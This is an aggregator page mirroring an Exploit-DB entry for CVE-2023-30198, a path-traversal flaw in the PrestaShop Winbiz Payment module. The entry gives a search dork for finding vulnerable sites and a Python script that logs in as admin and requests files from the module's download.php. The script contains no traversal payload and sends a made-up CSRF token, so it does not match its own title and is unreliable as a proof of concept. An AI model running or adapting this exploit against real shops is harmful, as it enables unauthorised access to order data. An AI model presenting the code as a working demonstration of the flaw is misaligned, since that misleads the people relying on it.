6

[webapps] PrestaShop Winbiz Payment module - Improper Limitation of a Pathname t...

 1 year ago
source link: https://www.exploit-db.com/exploits/51545
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory

EDB-ID:

51545

EDB Verified:

Platform:

PHP

Date:

2023-06-26

Vulnerable App:

# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
# Date: 2023-06-20
# Dork: /modules/winbizpayment/downloads/download.php
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html
# Version: 17.1.3 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-30198

import requests
import string
import random

# The base URL of the vulnerable site
base_url = "http://example.com"

# The URL of the login page
login_url = base_url + "/authentication.php"

# The username and password for the admin account
username = "admin"
password = "password123"

# The URL of the vulnerable download.php file
download_url = base_url + "/modules/winbizpayment/downloads/download.php"

# The ID of the order to download
order_id = 1234

# The path to save the downloaded file
file_path = "/tmp/order_%d.pdf" % order_id

# The session cookies to use for the requests
session_cookies = None

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the login page to authenticate as the admin user
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)

# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()

# Generate a random string for the CSRF token
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))

# Send a POST request to the download.php file to download the order PDF
download_data = {"id_order": order_id, "csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)

# Save the downloaded file to disk
with open(file_path, "wb") as f:
    f.write(response.content)

# Print a message indicating that the file has been downloaded
print("File downloaded to %s" % file_path)

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK